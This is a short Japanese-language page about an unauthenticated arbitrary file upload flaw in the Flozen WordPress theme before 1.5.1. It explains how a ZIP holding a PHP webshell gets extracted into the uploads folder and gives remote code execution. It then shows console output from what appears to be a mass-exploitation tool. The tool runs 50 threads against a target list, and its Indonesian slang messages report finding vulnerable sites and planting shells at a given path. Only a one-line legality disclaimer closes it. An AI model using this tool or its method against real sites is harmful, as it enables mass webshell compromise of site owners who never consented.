
Flozen < 1.5.1 - 認証なし任意ファイルアップロード
Flozen Theme < 1.5.1 - 認証なし任意ファイルアップロード
説明
WordPress用Flozenテーマ(バージョン1.5.1以下)は、flozen_add_new_custom_font()関数における認証チェックの欠如と不十分なファイルタイプ検証により、認証なしでの任意ファイルアップロードに対して脆弱です。これにより、認証されていない攻撃者は悪意のあるPHPコード(例:ウェブシェル)を含む任意のZIPファイルをアップロードでき、そのファイルは自動的にwp-content/uploads/nasa-custom-fonts/に展開され、完全なリモートコード実行(RCE)につながります。
~ CVSSスコア: 9.8 (緊急)
~ 影響を受けるバージョン: < 1.5.1
- [?] Enter filename with targets: list.txt
- [?] Enter threads (5-50): 50
- [*] Loading targets...
- [+] Loaded 267 targets
- [*] Starting 50 threads...
- [!] Gak Ada Bro Themes nya!: http://target.com
- [+] Gas Exploit Cuk! http://example.com/ | Version: 1.2.8 🚩💉
- [+] Shell Ada Bro! http://example.com/wp-content/uploads/nasa-custom-fonts/shadow/index.php
自分が所有していない、またはテストの許可を得ていないシステムへの不正使用は違法です。